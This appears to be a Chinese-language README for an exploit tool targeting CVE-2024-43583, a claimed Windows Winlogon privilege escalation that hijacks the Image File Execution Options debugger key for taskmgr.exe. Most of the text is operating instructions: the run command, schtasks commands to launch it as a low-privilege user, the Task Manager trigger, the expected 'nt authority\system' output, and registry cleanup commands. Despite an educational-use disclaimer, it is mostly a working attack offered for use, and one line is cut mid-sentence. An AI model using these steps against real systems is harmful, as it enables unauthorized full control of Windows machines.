作者: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 是一个影响微软 Winlogon 组件的 权限提升 漏洞。利用此漏洞,低权限用户可将自身权限提升至 SYSTEM,从而完全控制系统。
此概念验证(PoC)利用 Windows 映像文件执行选项(IFEO) 注册表键进行 调试器劫持,将合法系统进程替换为恶意载荷。
受影响的 Windows 版本
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
此漏洞利用工具仅用于 教育和研究目的。请勿在未经授权的系统上使用。滥用此漏洞利用工具可能违法。
确保目标系统上已安装 Python。若无,请使用编译好的 .exe 版本。
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc)。如果成功,将出现一个 SYSTEM shell 而不是任务管理器。漏洞利用工具运行后,检查当前权限:
whoami
预期输出:
nt authority\system
重新运行脚本并选择 选项 [2] 以移除劫持。
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"